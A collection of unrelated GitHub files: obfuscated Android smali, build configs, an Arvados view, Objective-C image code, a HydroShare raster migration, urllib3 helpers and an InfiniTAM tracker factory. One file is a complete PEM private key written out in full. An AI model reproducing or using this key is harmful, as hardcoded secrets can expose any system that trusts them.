Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bb:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bk:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bc:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bl:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bd:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bm:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->be:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bn:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bf:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bo:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bg:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bp:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bh:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->bq:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bi:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->br:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bj:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->f:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bk:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->g:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bl:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->h:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bm:Ljava/lang/String; sget-object v0, 
Lcom/m/u/ac;->i:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bn:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->j:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bo:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cg:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bp:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ch:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bq:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ci:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->br:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cj:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bs:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->ck:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bt:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cl:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bu:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cm:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bv:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cn:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bw:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->co:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bx:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->cp:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, 
Lcom/m/ac/aa;->by:Ljava/lang/String; invoke-static {}, Landroid/os/Environment;->getExternalStorageDirectory()Ljava/io/File; move-result-object v0 invoke-virtual {v0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->bz:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->dn:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ca:Ljava/lang/String; invoke-static {}, Lcom/m/ac/aa;->aa()I move-result v0 sput v0, Lcom/m/ac/aa;->cb:I sget-object v0, Lcom/m/u/ac;->k:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cc:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->l:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cd:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->m:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ce:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->n:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cf:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->o:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cg:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->p:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ch:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->q:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ci:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->r:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cj:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->s:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; 
move-result-object v0 sput-object v0, Lcom/m/ac/aa;->ck:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->t:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cl:Ljava/lang/String; sget-object v0, Lcom/m/u/ac;->u:[B invoke-static {v0}, Lcom/m/u/ae;->aa([B)Ljava/lang/String; move-result-object v0 sput-object v0, Lcom/m/ac/aa;->cm:Ljava/lang/String; return-void .end method .method private static aa()I .locals 1 invoke-static {}, Lcom/m/u/ah;->aa()Lcom/m/u/ah; move-result-object v0 invoke-virtual {v0}, Lcom/m/u/ah;->ac()Z move-result v0 if-eqz v0, :cond_0 const/4 v0, 0x1 :goto_0 return v0 :cond_0 const/16 v0, 0x1e goto :goto_0 .end method
{ "pile_set_name": "Github" }
# This blacklist should be applied when LLVM is built # with -fsanitize=undefined instrumentation. It exists # because libstdc++ has some undefined behavior issues # in some of the headers, in particular, stl_tree.h. # upcast of address with insufficient space for an object of type std::_Rb_tree_node<...> src:*bits/stl_tree.h # libstdc++ 4.8 creates a null reference when calling # data() on an empty vector: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=59829 src:*bits/stl_iterator.h src:*bits/stl_vector.h # These auto-generated functions compile down to ~50k basic blocks with inlining # and UBSan enabled, causing long builds that lead to bot timeouts. # https://bugs.llvm.org/show_bug.cgi?id=37929 fun:*AArch64*InstPrinter*printAliasInstr*
{ "pile_set_name": "Github" }
<%# Copyright (C) The Arvados Authors. All rights reserved. SPDX-License-Identifier: AGPL-3.0 %> <% content_for :tab_line_buttons do %> <div class="input-group"> <input type="text" class="form-control filterable-control recent-pipeline-instances-filterable-control" placeholder="Search pipeline instances" data-filterable-target="#recent-pipeline-instances" <%# Just for the double-load test in FilterableInfiniteScrollTest: %> value="<%= params[:search] %>" /> </div> <%= form_tag({action: 'compare', controller: params[:controller], method: 'get'}, {method: 'get', id: 'compare', class: 'pull-right small-form-margin'}) do |f| %> <%= submit_tag 'Compare 2 or 3 selected', {class: 'btn btn-primary', disabled: true} %> <% end rescue nil %> <% end %> <%= render file: 'application/index.html.erb', locals: local_assigns %>
{ "pile_set_name": "Github" }
<Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <OutputType>Exe</OutputType> <TargetFramework>netcoreapp3.0</TargetFramework> <Nullable>enable</Nullable> </PropertyGroup> <ItemGroup> <PackageReference Include="Microsoft.Extensions.Configuration.Json" Version="3.0.0" /> <PackageReference Include="Microsoft.Extensions.DependencyInjection" Version="3.0.0" /> <PackageReference Include="Microsoft.Extensions.Hosting" Version="3.0.0" /> <PackageReference Include="Microsoft.Extensions.Options" Version="3.0.0" /> <PackageReference Include="Microsoft.Extensions.Options.ConfigurationExtensions" Version="3.0.0" /> </ItemGroup> <ItemGroup> <None Update="appsettings.json"> <CopyToOutputDirectory>PreserveNewest</CopyToOutputDirectory> </None> </ItemGroup> </Project>
{ "pile_set_name": "Github" }
-----BEGIN PRIVATE KEY----- MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgSB2awBKFfwQXSKYq O1b9QwlKdVzg8FAf5MBQ6s/0T7+hRANCAAR9bXAk4NDrb91L5/wSfkv7RrnNkKcV fcngncUN7iw/ThzruSv2qAbskWUPDbaoFQA7iVP799K7eKsADUIEBUbJ -----END PRIVATE KEY-----
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>com.company</groupId> <artifactId>x-manerger-sys-common-sms</artifactId> <version>0.0.1-SNAPSHOT</version> <packaging>jar</packaging> <name>x-manerger-sys-common-sms</name> <description>Demo project for Spring Boot</description> <!--<parent>--> <!--<groupId>org.springframework.boot</groupId>--> <!--<artifactId>spring-boot-starter-parent</artifactId>--> <!--<version>2.1.0.RELEASE</version>--> <!--<relativePath/> &lt;!&ndash; lookup parent from repository &ndash;&gt;--> <!--</parent>--> <parent> <groupId>com.company</groupId> <artifactId>x-manerger-sys-common</artifactId> <version>0.0.1-SNAPSHOT</version> <!--<relativePath/> &lt;!&ndash; lookup parent from repository &ndash;&gt;--> </parent> <properties> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding> <java.version>1.8</java.version> <!-- 并发框架Disruptor --> <disruptor.version>3.3.6</disruptor.version> <dom4j.version>1.6.1</dom4j.version> <beetl.version>1.1.55.RELEASE</beetl.version> </properties> <dependencies> <!--<dependency>--> <!--<groupId>org.springframework.boot</groupId>--> <!--<artifactId>spring-boot-starter</artifactId>--> <!--</dependency>--> <!--<dependency>--> <!--<groupId>org.springframework.boot</groupId>--> <!--<artifactId>spring-boot-starter-test</artifactId>--> <!--<scope>test</scope>--> <!--</dependency>--> <dependency> <groupId>com.company</groupId> <artifactId>x-manerger-sys-common-utils</artifactId> <version>0.0.1-SNAPSHOT</version> </dependency> <dependency> <groupId>com.lmax</groupId> <artifactId>disruptor</artifactId> <version>${disruptor.version}</version> </dependency> <dependency> <groupId>com.ibeetl</groupId> 
<artifactId>beetl-framework-starter</artifactId> <version>${beetl.version}</version> </dependency> <dependency> <groupId>com.google.code.gson</groupId> <artifactId>gson</artifactId> <version>2.8.5</version> </dependency> <!--阿里--> <dependency> <groupId>com.aliyun</groupId> <artifactId>aliyun-java-sdk-core</artifactId> <version>4.0.8</version> </dependency> <dependency> <groupId>com.aliyun</groupId> <artifactId>aliyun-java-sdk-dysmsapi</artifactId> <version>1.1.0</version> </dependency> <!--huyi--> <dependency> <groupId>dom4j</groupId> <artifactId>dom4j</artifactId> <version>${dom4j.version}</version> </dependency> <!--腾讯短信--> <dependency> <groupId>com.github.qcloudsms</groupId> <artifactId>qcloudsms</artifactId> <version>1.0.5</version> </dependency> </dependencies> <build> <finalName>${project.artifactId}</finalName> <plugins> <!-- 编码和编译和JDK版本 --> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <version>2.3.2</version> <configuration> <source>${maven.compiler.source}</source> <target>${maven.compiler.source}</target> <encoding>${project.build.sourceEncoding}</encoding> </configuration> </plugin> </plugins> </build> </project>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!-- Copyright (C) 2018 The Android Open Source Project Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <resources xmlns:android="http://schemas.android.com/apk/res/android" xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2"> <string name="enabled_by_admin" msgid="6630472777476410137">"ನಿರ್ವಾಹಕರು ಸಕ್ರಿಯಗೊಳಿಸಿದ್ದಾರೆ"</string> <string name="disabled_by_admin" msgid="4023569940620832713">"ನಿರ್ವಾಹಕರು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿದ್ದಾರೆ"</string> </resources>
{ "pile_set_name": "Github" }
/* * This file is part of the SDWebImage package. * (c) Olivier Poitrey <[email protected]> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ #import "NSImage+Compatibility.h" #if SD_MAC #import "SDImageCoderHelper.h" @implementation NSImage (Compatibility) - (nullable CGImageRef)CGImage { NSRect imageRect = NSMakeRect(0, 0, self.size.width, self.size.height); CGImageRef cgImage = [self CGImageForProposedRect:&imageRect context:nil hints:nil]; return cgImage; } - (CGFloat)scale { CGFloat scale = 1; NSRect imageRect = NSMakeRect(0, 0, self.size.width, self.size.height); NSImageRep *imageRep = [self bestRepresentationForRect:imageRect context:nil hints:nil]; CGFloat width = imageRep.size.width; CGFloat height = imageRep.size.height; NSUInteger pixelWidth = imageRep.pixelsWide; NSUInteger pixelHeight = imageRep.pixelsHigh; if (width > 0 && height > 0) { CGFloat widthScale = pixelWidth / width; CGFloat heightScale = pixelHeight / height; if (widthScale == heightScale && widthScale >= 1) { // Protect because there may be `NSImageRepMatchesDevice` (0) scale = widthScale; } } return scale; } - (instancetype)initWithCGImage:(nonnull CGImageRef)cgImage scale:(CGFloat)scale orientation:(CGImagePropertyOrientation)orientation { NSBitmapImageRep *imageRep; if (orientation != kCGImagePropertyOrientationUp) { // AppKit design is different from UIKit. Where CGImage based image rep does not respect to any orientation. Only data based image rep which contains the EXIF metadata can automatically detect orientation. // This should be nonnull, until the memory is exhausted cause `CGBitmapContextCreate` failed. 
CGImageRef rotatedCGImage = [SDImageCoderHelper CGImageCreateDecoded:cgImage orientation:orientation]; imageRep = [[NSBitmapImageRep alloc] initWithCGImage:rotatedCGImage]; CGImageRelease(rotatedCGImage); } else { imageRep = [[NSBitmapImageRep alloc] initWithCGImage:cgImage]; } if (scale < 1) { scale = 1; } CGFloat pixelWidth = imageRep.pixelsWide; CGFloat pixelHeight = imageRep.pixelsHigh; NSSize size = NSMakeSize(pixelWidth / scale, pixelHeight / scale); self = [self initWithSize:size]; if (self) { imageRep.size = size; [self addRepresentation:imageRep]; } return self; } - (instancetype)initWithData:(nonnull NSData *)data scale:(CGFloat)scale { NSBitmapImageRep *imageRep = [[NSBitmapImageRep alloc] initWithData:data]; if (!imageRep) { return nil; } if (scale < 1) { scale = 1; } CGFloat pixelWidth = imageRep.pixelsWide; CGFloat pixelHeight = imageRep.pixelsHigh; NSSize size = NSMakeSize(pixelWidth / scale, pixelHeight / scale); self = [self initWithSize:size]; if (self) { imageRep.size = size; [self addRepresentation:imageRep]; } return self; } @end #endif
{ "pile_set_name": "Github" }
import os import shutil import logging import tempfile import subprocess import xml.etree.ElementTree as ET from django.db import migrations from django.core.files.uploadedfile import UploadedFile from django_irods.storage import IrodsStorage from hs_core import hydroshare from hs_core.hydroshare.utils import resource_modified from hs_geo_raster_resource.models import RasterResource from hs_file_types import raster_meta_extract def migrate_tif_file(apps, schema_editor): log = logging.getLogger() istorage = IrodsStorage() copy_res_fail = [] vrt_update_fail = [] vrt_update_success = [] meta_update_fail = [] meta_update_success = [] # start migration for each raster resource that has raster files for res in RasterResource.objects.all(): if res.files.all(): # copy all the resource files to temp dir try: temp_dir = tempfile.mkdtemp() for res_file in res.files.all(): shutil.copy(res_file.resource_file.file.name, os.path.join(temp_dir, os.path.basename(res_file.resource_file.name))) vrt_file_path = [os.path.join(temp_dir, f) for f in os.listdir(temp_dir) if '.vrt' == f[-4:]].pop() except Exception as e: log.exception(str(e)) copy_res_fail.append('{}:{}'.format(res.short_id, res.metadata.title.value)) continue # update vrt file if the raster resource that has a single tif file try: if len(os.listdir(temp_dir)) == 2: # create new vrt file tif_file_path = [os.path.join(temp_dir, f) for f in os.listdir(temp_dir) if '.tif' == f[-4:]].pop() with open(os.devnull, 'w') as fp: subprocess.Popen(['gdal_translate', '-of', 'VRT', tif_file_path, vrt_file_path], stdout=fp, stderr=fp).wait() # remember to add .wait() # modify the vrt file contents tree = ET.parse(vrt_file_path) root = tree.getroot() for element in root.iter('SourceFilename'): element.attrib['relativeToVRT'] = '1' tree.write(vrt_file_path) # delete vrt res file for f in res.files.all(): if 'vrt' == f.resource_file.name[-3:]: f.resource_file.delete() f.delete() # add new vrt file to resource new_file = 
UploadedFile(file=open(vrt_file_path, 'r'), name=os.path.basename(vrt_file_path)) hydroshare.add_resource_files(res.short_id, new_file) # update the bag bag_name = 'bags/{res_id}.zip'.format(res_id=res.short_id) if istorage.exists(bag_name): # delete the resource bag as the old bag is not valid istorage.delete(bag_name) resource_modified(res, res.creator) vrt_update_success.append('{}:{}'.format(res.short_id,res.metadata.title.value)) except Exception as e: log.exception(str(e)) vrt_update_fail.append('{}:{}'.format(res.short_id,res.metadata.title.value)) # update the metadata for the band information of all the raster resources try: meta_updated = False # extract meta ori_dir = os.getcwd() os.chdir(temp_dir) res_md_dict = raster_meta_extract.get_raster_meta_dict(vrt_file_path) os.chdir(ori_dir) shutil.rmtree(temp_dir) # update band information metadata in django if res_md_dict['band_info']: for i, band_meta in list(res_md_dict['band_info'].items()): band_obj = res.metadata.bandInformation.filter(name='Band_{}'.format(i)).first() if band_obj: res.metadata.update_element('bandInformation', band_obj.id, maximumValue=band_meta['maximumValue'], minimumValue=band_meta['minimumValue'], noDataValue=band_meta['noDataValue'], ) meta_updated = True # update the bag if meta is updated if meta_updated: bag_name = 'bags/{res_id}.zip'.format(res_id=res.short_id) if istorage.exists(bag_name): # delete the resource bag as the old bag is not valid istorage.delete(bag_name) resource_modified(res, res.creator) meta_update_success.append('{}:{}'.format(res.short_id, res.metadata.title.value)) except Exception as e: log.exception(str(e)) meta_update_fail.append('{}:{}'.format(res.short_id, res.metadata.title.value)) # Print migration results print(('Copy resource to temp folder failure: Number: {} List: {}'.format(len(copy_res_fail), copy_res_fail))) print(('VRT file update success: Number: {} List{}'.format(len(vrt_update_success), vrt_update_success))) print(('VRT file update fail: 
Number: {} List{}'.format(len(vrt_update_fail), vrt_update_fail))) print(('Meta update success: Number: {} List {}'.format(len(meta_update_success), meta_update_success))) print(('Meta update fail: Number: {} List {}'.format(len(meta_update_fail), meta_update_fail))) def undo_migrate_tif_file(apps, schema_editor): log = logging.getLogger() meta_reverse_fail = [] # loop through each raster resource and change the no data value, min, max values of each band for res in RasterResource.objects.all(): for band_obj in res.metadata.bandInformation: try: res.metadata.update_element('bandInformation', band_obj.id, maximumValue=None, minimumValue=None, noDataValue=None, ) except Exception as e: log.exception(str(e)) meta_reverse_fail.append('{}:{}, band:{}'.format(res.short_id, res.metadata.title.value, band_obj.id)) print(('Meta recover to initial state fail: List {}'.format(meta_reverse_fail))) class Migration(migrations.Migration): dependencies = [ ('hs_geo_raster_resource', '0005_auto_20160509_2116'), ] operations = [ migrations.RunPython(code=migrate_tif_file, reverse_code=undo_migrate_tif_file), ]
{ "pile_set_name": "Github" }
from __future__ import absolute_import
from ..packages.six.moves import http_client as httplib

from ..exceptions import HeaderParsingError


def is_fp_closed(obj):
    """
    Checks whether a given file-like object is closed.

    :param obj:
        The file-like object to check.
    :raises ValueError:
        If the object exposes neither ``closed`` nor ``fp``, so its state
        cannot be determined.
    """

    try:
        # Check via the official file-like-object way.
        return obj.closed
    except AttributeError:
        pass

    try:
        # Check if the object is a container for another file-like object that
        # gets released on exhaustion (e.g. HTTPResponse).
        return obj.fp is None
    except AttributeError:
        pass

    # Neither attribute exists; the object does not look file-like at all.
    raise ValueError("Unable to determine whether fp is closed.")


def assert_header_parsing(headers):
    """
    Asserts whether all headers have been successfully parsed.
    Extracts encountered errors from the result of parsing headers.

    Only works on Python 3.

    :param headers: Headers to verify.
    :type headers: `httplib.HTTPMessage`.

    :raises urllib3.exceptions.HeaderParsingError:
        If parsing errors are found.
    :raises TypeError:
        If ``headers`` is not an ``httplib.HTTPMessage``.
    """

    # This will fail silently if we pass in the wrong kind of parameter.
    # To make debugging easier add an explicit check.
    if not isinstance(headers, httplib.HTTPMessage):
        raise TypeError('expected httplib.Message, got {0}.'.format(
            type(headers)))

    # NOTE(review): presumably `defects` is filled in by the stdlib email
    # parser during header parsing — confirm against email.feedparser docs.
    defects = getattr(headers, 'defects', None)
    get_payload = getattr(headers, 'get_payload', None)

    unparsed_data = None
    if get_payload:  # Platform-specific: Python 3.
        # Any payload on a headers-only message is data the parser could
        # not attribute to a header.
        unparsed_data = get_payload()

    if defects or unparsed_data:
        raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)


def is_response_to_head(response):
    """
    Checks whether the request of a response has been a HEAD-request.
    Handles the quirks of AppEngine.

    :param response:
        The response whose originating request method is inspected.
    :type response: :class:`httplib.HTTPResponse`
    """
    # FIXME: Can we do this somehow without accessing private httplib _method?
    method = response._method
    if isinstance(method, int):  # Platform-specific: Appengine
        # NOTE(review): assumes AppEngine's httplib stores the method as an
        # int where 3 denotes HEAD — confirm against the AppEngine runtime.
        return method == 3
    return method.upper() == 'HEAD'
{ "pile_set_name": "Github" }
// Copyright 2014-2017 Oxford University Innovation Limited and the authors of InfiniTAM #pragma once #include <stdexcept> #include <vector> #include "CPU/ITMColorTracker_CPU.h" #include "CPU/ITMDepthTracker_CPU.h" #include "CPU/ITMExtendedTracker_CPU.h" #include "Interface/ITMCompositeTracker.h" #include "Interface/ITMIMUTracker.h" #include "Interface/ITMFileBasedTracker.h" #include "Interface/ITMForceFailTracker.h" #include "Interface/ITMTracker.h" #include "../Engines/LowLevel/Interface/ITMLowLevelEngine.h" #include "../Utils/ITMLibSettings.h" #ifndef COMPILE_WITHOUT_CUDA #include "CUDA/ITMColorTracker_CUDA.h" #include "CUDA/ITMDepthTracker_CUDA.h" #include "CUDA/ITMExtendedTracker_CUDA.h" #endif #ifdef COMPILE_WITH_METAL #include "Metal/ITMExtendedTracker_Metal.h" #endif #include "../../ORUtils/KeyValueConfig.h" namespace ITMLib { /** * \brief An instance of this class can be used to construct trackers. */ class ITMTrackerFactory { private: //#################### TYPEDEFS #################### typedef ITMTracker* MakerFunc(const Vector2i&,const Vector2i&,ITMLibSettings::DeviceType,const ORUtils::KeyValueConfig &,const ITMLowLevelEngine*,ITMIMUCalibrator*,const ITMSceneParams*); /// Tracker types typedef enum { //! Identifies a tracker based on colour image TRACKER_COLOR, //! Identifies a tracker based on depth image TRACKER_ICP, //! Identifies a tracker based on depth and color image with various extensions TRACKER_EXTENDED, //! Identifies a tracker reading poses from text files TRACKER_FILE, //! Identifies a tracker based on depth image and IMU measurement TRACKER_IMU, //! Identifies a tracker based on depth and colour images and IMU measurement TRACKER_EXTENDEDIMU, //! 
Identifies a tracker that forces tracking to fail TRACKER_FORCEFAIL, } TrackerType; struct Maker { const char *id; const char *description; TrackerType type; MakerFunc *make; Maker(const char *_id, const char *_desc, TrackerType _type, MakerFunc *_make) : id(_id), description(_desc), type(_type), make(_make) {} }; //#################### PRIVATE VARIABLES #################### /** A list of maker functions for the various tracker types. */ std::vector<Maker> makers; //################## SINGLETON IMPLEMENTATION ################## /** * \brief Constructs a tracker factory. */ ITMTrackerFactory(void) { makers.push_back(Maker("rgb", "Colour based tracker", TRACKER_COLOR, &MakeColourTracker)); makers.push_back(Maker("icp", "Depth based ICP tracker", TRACKER_ICP, &MakeICPTracker)); makers.push_back(Maker("extended", "Depth + colour based tracker", TRACKER_EXTENDED, &MakeExtendedTracker)); makers.push_back(Maker("file", "File based tracker", TRACKER_FILE, &MakeFileBasedTracker)); makers.push_back(Maker("imuicp", "Combined IMU and depth based ICP tracker", TRACKER_IMU, &MakeIMUTracker)); makers.push_back(Maker("extendedimu", "Combined IMU and depth + colour ICP tracker", TRACKER_EXTENDEDIMU, &MakeExtendedIMUTracker)); makers.push_back(Maker("forcefail", "Force fail tracker", TRACKER_FORCEFAIL, &MakeForceFailTracker)); } public: /** * \brief Gets the singleton instance for the current set of template parameters. */ static ITMTrackerFactory& Instance() { static ITMTrackerFactory s_instance; return s_instance; } //################## PUBLIC MEMBER FUNCTIONS ################## public: /** * \brief Makes a tracker of the type specified in the trackerConfig string. 
*/ ITMTracker *Make(ITMLibSettings::DeviceType deviceType, const char *trackerConfig, const Vector2i & imgSize_rgb, const Vector2i & imgSize_d, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) const { ORUtils::KeyValueConfig cfg(trackerConfig); int verbose = 0; if (cfg.getProperty("help") != NULL) if (verbose < 10) verbose = 10; ORUtils::KeyValueConfig::ChoiceList trackerOptions; for (int i = 0; (unsigned)i < makers.size(); ++i) { trackerOptions.addChoice(makers[i].id, makers[i].type); } int type = TRACKER_ICP; cfg.parseChoiceProperty("type", "type of tracker", type, trackerOptions, verbose); const Maker *maker = NULL; for (int i = 0; (unsigned)i < makers.size(); ++i) { if (makers[i].type == type) { maker = &(makers[i]); break; } } if (maker == NULL) DIEWITHEXCEPTION("Unknown tracker type"); ITMTracker *ret = (*(maker->make))(imgSize_rgb, imgSize_d, deviceType, cfg, lowLevelEngine, imuCalibrator, sceneParams); if (ret->requiresColourRendering()) { printf("Assuming a voxel type with colour information!"); } return ret; } /** * \brief Makes a tracker of the type specified in the settings. 
*/ ITMTracker *Make(const Vector2i & imgSize_rgb, const Vector2i & imgSize_d, const ITMLibSettings *settings, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) const { return Make(settings->deviceType, settings->trackerConfig, imgSize_rgb, imgSize_d, lowLevelEngine, imuCalibrator, sceneParams); } //#################### PUBLIC STATIC MEMBER FUNCTIONS #################### static std::vector<TrackerIterationType> parseLevelConfig(const char *str) { bool parseError = false; std::vector<TrackerIterationType> ret; for (int i = static_cast<int>(strlen(str))-1; i >= 0; --i) { switch (str[i]) { case 'r': ret.push_back(TRACKER_ITERATION_ROTATION); break; case 't': ret.push_back(TRACKER_ITERATION_TRANSLATION); break; case 'b': ret.push_back(TRACKER_ITERATION_BOTH); break; case 'n': ret.push_back(TRACKER_ITERATION_NONE); break; default: parseError = true; break; } } if (parseError) { fprintf(stderr, "error parsing level configuration '%s'\n", str); for (int i = 0; (unsigned)i < ret.size(); ++i) fprintf(stderr, "level %i: %i\n", (int)ret.size()-i, (int)(ret[ret.size()-i])); } return ret; } /** * \brief Makes a colour tracker. 
